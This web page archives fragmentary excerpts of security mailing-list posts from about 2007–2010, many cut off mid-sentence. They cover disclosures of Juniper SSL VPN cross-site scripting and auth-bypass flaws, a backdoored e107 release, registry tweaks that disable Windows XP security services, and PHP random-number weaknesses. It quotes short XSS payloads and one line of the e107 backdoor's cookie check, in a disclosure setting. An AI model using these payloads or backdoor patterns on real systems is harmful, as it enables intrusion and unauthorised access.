
Re: Circumventing Critical Security in Windows XP

Thank you for your reply. 


Firstly, it goes without saying that given time, effort and resources,
exploitation of any kind will eventually succeed. However, exploitation
via this vector now becomes a mere "tick in a box", so to speak. The
whole experience is instant, requiring no effort whatsoever; on the very
next reboot these critical security services are disabled.


Announce: RFIDIOt-1.0a released - November 2009

Hey!

I know it's been a while, but I've been busy etc. etc. :)

After 3 years, I've finally got around to a full release number! Here is 
version 1.0a, in which I've started integrating Nick von Dadelszen's 
libnfc (http://www.libnfc.org/) wrapper so we can support the new 
generation of usb stick readers which are practically given away with 
digital cash products such as Snapper 
(http://www.snapper.co.nz/index.html). I've also done a lot of tidying 

some ooold Juniper bugs (was: [Full-disclosure] ZDI-10-231: Juniper Secure Access Series meeting_testjava.cgi XSS Vulnerability)

This reminded me of a bunch of problems I spotted in Juniper SSL VPN a
while ago; they are apparently fixed, but I don't recall seeing any
public vendor advisory / credit for reporting them - so here you go,
even if just for the record...

These were fixed by Juniper in IVE 6.3R1, 6.2R3, 6.1R5, 6.0R8, and 5.5
R7.1 over a year ago.

1) Auth bypass - IVE permitted just about any script on the box to be
invoked without authentication by going through a
/dana-na/download/?url= hop, for example:

Re: e107 latest download link is backdoored

I've just checked the archive. The latest version of the file class2.php was
changed on 2010/01/21 03:57:43 and it does not contain the malicious code.
It has probably been replaced already, or we are using different mirrors.

Valery Marchuk
www.SecurityLab.ru

----- Original Message ----- 
From: "Bogdan Calin" <bogdan@acunetix.com>
To: <full-disclosure@lists.grok.org.uk>

PR09-17: Juniper Secure Access series (Juniper IVE) authenticated XSS & REDIRECTION

PR09-17: Juniper Secure Access series (Juniper IVE) authenticated XSS &
REDIRECTION

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr09-17

Vulnerability found: 12th October 2009

Vendor informed: 12 October 2009

Severity: Medium (Script injection)

Code to mitigate IE event zero-day (CVE-2010-0249)

*please* respond to the mailing list.

Use this code at your own risk.  It could contain mistakes, cause
problems with other software, and fail to protect your computer.

I've done some very basic testing on the following configurations:

 * Windows 2000 SP4, IE6 SP1
 * Windows XP (x86) SP3, IE 6 SP3
 * Windows XP (x86) SP3, IE 7
 * Windows XP x64 SP1, IE 6 SP1 (32-bit and 64-bit)

PR09-16: Juniper Secure Access series (Juniper IVE) Cross-Site Scripting Vulnerability

PR09-16: Juniper Secure Access series (Juniper IVE) XSS

Vulnerability found: 12th October 2009

Severity: Medium (Script injection)

Description:

There is a Cross-site Scripting vulnerability on Juniper, IVE web interface.


Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

such as '=' or '"' or others are specified. 

It's not immediately obvious that this error is still exploitable, simple
tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
isn't helpful as the code isn't evaluated again. In situations like this, the
best course of action is to harass lcamtuf until he gives you the solution,
which of course his encyclopaedic knowledge of browser security quirks produced
immediately.

<script defer>code</script>


e107 latest download link is backdoored

Hi guys,

The latest version of e107, version 0.7.17 contains a PHP backdoor.
http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

I've just downloaded this file and while looking through the code, I've
found the following piece of code:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

> such as '=' or '"' or others are specified. 
>
> It's not immediately obvious that this error is still exploitable, simple
> tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
> isn't helpful as the code isn't evaluated again. In situations like this, the
> best course of action is to harass lcamtuf until he gives you the solution,
> which of course his encyclopaedic knowledge of browser security quirks produced
> immediately.
>
> <script defer>code</script>
>

Circumventing Critical Security in Windows XP

Hi,


I've detailed below just how easy (too easy) it is to circumvent the security of the following critical security services. Thus can't now become can!

It goes without saying that malware on entering a system by whichever means, and on detecting critical security services, can now even more easily (automated/scripted) disarm critical security services, just by modifying unprotected registry entries, for whatever malevolent purposes.

I've created registry entries (I can send these to you should you be interested) to demonstrate just how easy it is to circumvent the security of these critical security services, which unfortunately is all too easily a very effective way of immobilising critical security functions i.e. firewall, antivirus etc. This in my opinion is certainly not a vulnerability nor a flaw so to speak, but rather a functional design oversight?

I've verified this against the following with success. After these registry modifications have been effected and the system rebooted, these critical services will be disarmed.

PHP "multipart/form-data" denial of service

2. Install PHP 5.3.1
If you cannot disable file uploading on your website, it's recommended
to install the latest version of PHP.
PHP 5.3.1 includes a patch for this problem:
- Added "max_file_uploads" INI directive, which can be set to limit the
number of file uploads per-request to 20 by default, to prevent possible
DOS via temporary file exhaustion.

3. Install Suhosin PHP extension
The Suhosin PHP extension has an option named "suhosin.upload.max_uploads".

Country by Country ISA Computer Sets

Recently, David Litchfield asked me to help him out a bit with a research project he was working on by having me set up a network capture in my DMZ to log SQL Slammer attacks. I don't publish any services here at my Santa Cruz facility (meaning there are no required inbound protocols and no references in DNS anywhere), so I figured it would be a nice "quiet" circuit to use for testing. I basically port-forwarded UDP 1434 to a laptop in my DMZ running NetMon3, also filtering for UDP 1434. After about 4 days of running NetMon, I had captured almost 30 (verified) random SQL Slammer attacks. What I found interesting was that every single one of them was sourced in China (all from different addresses).

Now, it's not my intent to start some geopolitical debate here, but I've long heard about how some people would block entire countries at the border in order to obviate issues with malicious traffic. There are obviously some issues with this (both from a technical and a potential-customer standpoint), so I set out to do a bit of research on my own. The first thing I found out was that if one does decide to block entire countries, it's going to be a bit of work from a rule standpoint. Sure, if I wanted to block all of China I could block APNIC, but that would block WAY more than I would want. So I set about finding a good resource for country-by-country IP ranges. Fortunately, Wade Alcorn, one of my colleagues at NGSSoftware, turned me on to one that seemed pretty decent (there are a few around, though). But finding the resource was just the beginning... The list I got included 234 countries, comprising almost 100,000 records of IP ranges.

Making a firewall rule to block China, for instance, would require entering almost 600 IP ranges, so the "manual" route was clearly out. The thing is, I just didn't want to block countries without more research, so I needed a way to gather some statistics first. Enter ISA Server. As many of you know, I'm a big fan of ISA; it's a true enterprise security product with great scripting capabilities, so I set to work creating an automated method by which to create computer sets in ISA for each country. Basically, I created a SQL database and loaded all the records into it. I then wrote a little COM app to reach out and grab the data by country, create the sets in ISA, and loop through the different ranges of IPs to add them to the set. It worked great.

This accomplished two things. One, I now have full, detailed computer sets for each country to do with as I please. Secondly, I have an excellent way of producing detailed reports for traffic analysis in ISA; this was key. With data collection points set up at different places around the world, I was able to capture 3.1 million inbound connection attempts. The results were quite interesting. While China still led with connection attempts overall, it was interesting to see that Canada was a close second. However, while China's traffic consisted of SQL Slammer, HTTP, SMTP, probes for GhostProxy, etc., almost all of Canada's traffic was MESSENGER spam (UDP 1026, 1027, 1208). The world leader for HTTP was Brazil, strangely enough. Now, all of this will change based on who and where you are, and the types of services being offered. For example, I only got 5 SMTP connection attempts to my cable modem in a week, but my ISP in BM got hundreds of thousands (understandably) in the same time period. I'll whip up some cool reports for what I found and post them once I get some more data in from different collection points, but the valuable outcome of the project was the creation of these individual country-by-country Computer Sets for ISA.

Beforehand, I had no real way of easily and effectively reporting on traffic patterns by source country. Whether you can or can't block entire countries is your business, but at least this affords someone an easy way of doing research. You may not be able to (or even want to) block HTTP from China, but you very well may want to block SMTP; with ISA and computer sets, you can easily do this. Even if you don't block anything at all, you can use the sets to get rich reports of what kind of traffic you are getting from a particular country. While the validity of the practice of blocking entire countries (or particular protocols, for that matter) may be up for debate, you now at least have the option to make your own decision based on factual information. To be sure, you've always been able to do this; it's just been my experience that maintaining rule lists by country/protocol has been quite difficult and time consuming.

I've exported every country's entire list to ISA 2006 .XML format, and have posted them on the HoG site for community use. Since I've automated the Set creation process, I'll be updating the sets each month or so to ensure that changes are processed correctly. I would like to thank NGSSoftware for purchasing the required business services to receive the updates; their donation makes it possible for me to give you updated sets for free.

Re: [botnets] re MAC trojan (fwd)

As Gadi mentioned, there are a number of known issues that Apple has
yet to address.  If the professional malware authors are now taking aim
at Mac users, Apple appears to be making it easy for them.

There are a few comments that I've seen in this thread that are rather
worrisome:

::: Interspace System Department
> Relax. MAC users are not that stupid as MS users...


RE: Next generation malware: Windows Vista's gadget API

Great overview, Todd!
I've just wanted to mention that MS downplayed the vulnerabilities I've
found in Vista's Sidebar gadgets.
In my blog post
(http://aviv.raffon.net/2007/08/16/VistaGadgetsGoneWild.aspx), I've
demonstrated a scenario where a worm can be propagated by exploiting the
vulnerability in the RSS feeds gadget.
I don't understand why Microsoft rated this vulnerability as important,
instead of critical.


Re: Circumventing Critical Security in Windows XP

On 2010-02-17 barkley@usa.net wrote:
> I've detailed below just how easy (too easy) it is to circumvent the
> security of the following critical security services. Thus can't now
> become can!
> 
> It goes without saying that malware on entering a system by whichever
> means, and on detecting critical security services, can now even more
> easily (automated/scripted) disarm critical security services, just by
> modifying unprotected registry entries, for whatever malevolent
> purposes.

Abusing weak PRNGs in PHP applications

Hello all, 

To cut the intro blablablas short, I've compiled this video here:

http://www.youtube.com/watch?v=NMhO00bnRzM

It's about abusing PHP's builtin PRNG functions to attack web applications. 

It starts where Stefan Esser's wonderful article "mt_srand and not so random numbers" ( http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ ) ended.


Juniper SA Series Cross Site Scripting Issue

as SSO automatically grants the hijacked session access to other systems
(e.g. typically used in combination with Outlook Web  Access).

o AFFECTED SYSTEMS

Juniper SA appliances running Juniper IVE OS 6.0 or higher

o SOLUTION

Juniper released IVE updates 6.3R7, 6.4R5 and 6.5R2 which fix this issue.
The updates and installation instructions are available for Juniper

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

Hi Mustlive,
I'm not sure if there's a need to discuss or clarify this any further.
Please refer to my earlier posts, and for the sake of saving some of our
time & efforts, avoid drawing tangents about scripts and noscripts (I've
clarified both earlier) & weasel words (security vulnerability and nntp
exploit - irrelevant in this case).
JS or no-JS, this issue is nothing new; this behavior is well-defined and a
necessity, and definitely not a URI (of any kind) exploit or a security
vulnerability.


ZoneAlarm Security Circumvention

Hi,


During my (in)security research, I've discovered what appears initially to be
a design oversight and not necessarily a vulnerability, affecting ZoneAlarm
and various other security vendors. I've tested this on various XP platforms
successfully, please feel free to notify the vendor as you wish and/or to
publish whatever you feel appropriate under the circumstances.



Re: [WEB SECURITY] countermeasure against attacks through HTML shared files

> The paper is available at:
> 
> http://www.pomcor.com/whitepapers/file_sharing_security.pdf
> 
> I have not been able to find much prior work.
> What I've found is discussed in Section 2 of the
> paper.  If I've missed something, please let me
> know.
> 
> Thanks,
> 

countermeasure against attacks through HTML shared files

The paper is available at:

http://www.pomcor.com/whitepapers/file_sharing_security.pdf

I have not been able to find much prior work.
What I've found is discussed in Section 2 of the
paper.  If I've missed something, please let me
know.

Thanks,


Re: countermeasure against attacks through HTML shared files

> are essentially XSS attacks, but the usual

> http://www.pomcor.com/whitepapers/file_sharing_security.pdf
> 
> I have not been able to find much prior work.
> What I've found is discussed in Section 2 of the
> paper.  If I've missed something, please let me
> know.

The gist of your suggestion is to use different base URLs
for the untrusted content, so that "same origin" policies

Re: [WEB SECURITY] countermeasure against attacks through HTML shared files

different hostnames to protect against XSS:

See Brian Eaton's post to WebSecurity mailing list, May 18th, 2007, 
titled "Re: [WEB SECURITY] How to avoid XSS into PDF Files, using java".

http://www.webappsec.org/lists/websecurity/archive/2007-05/msg00087.html

fcorella@pomcor.com wrote:
> Hello,
>
> I wanted to announce a Pomcor white paper that

Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]

have fixed it in Exchange 2007.

On Sat, Nov 15, 2008 at 5:33 AM, Piergiorgio Venuti
<piergiorgio@gigasec.org> wrote:
> Hi all,
> I also found this vulnerability 1 year ago during a pt and it works fine
> with url obfuscation. I've read that with owa 2007 this vulnerability is
> patched but I haven't tried it yet.
>
> Best regards,
> Piergiorgio

Re: MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]

Hi all,
I also found this vulnerability 1 year ago during a pt and it works fine
with url obfuscation. I've read that with owa 2007 this vulnerability is
patched but I haven't tried it yet.

Best regards,
Piergiorgio


Giuseppe Gottardi wrote:

RE: MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]

I verified that OWA 2007 is not vulnerable to the redirection attacks
described below. 

Angelo Castigliola III
EISRM - Application Security Architecture
Unum
Telephone: 207-575-3820
Mobile: 207-590-3630
acastigliola@unum.com


Re: "Exploit creation - The random approach" or "Playing with random to build exploits"

>> for years and years, but all our attention was gave to the shellcode.

> Well, actually that's because the polymorphic code for viruses and worms
> came even before, and was already a beaten issue.

I didn't get this age (Virus Age), sorry. The last virus I've heard
about was the CIH. The last real virus, I presume. Right?

>> even during my research, when I talked to someone about the perspective of
>> having a real polymorphic code, people always got confused with polymorphic
>> shellcode.

Application-level OS fingerprinting research - pre-release hashes

Since I seem to have the curse of waiting too long to release research and then seeing it released by someone else, I've decided I'm going to release a couple hashes of an existing version of the presentation I've made on the topic while I iron it out with some peer review.

The research I'm doing deals with performing OS fingerprinting through application-level probing more advanced than simple banner grabbing. I will also give several examples with Apache HTTP server version 2.2.9, the latest at the time the paper was written. I expect these techniques should work on most versions of Apache, though I have not tested it.

The hashes are for a .ppt file, though I hope to have the research available as a whitepaper as well, in .pdf and .txt format.

I should be releasing it by the end of the month if all goes according to plan.

Thank you!


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
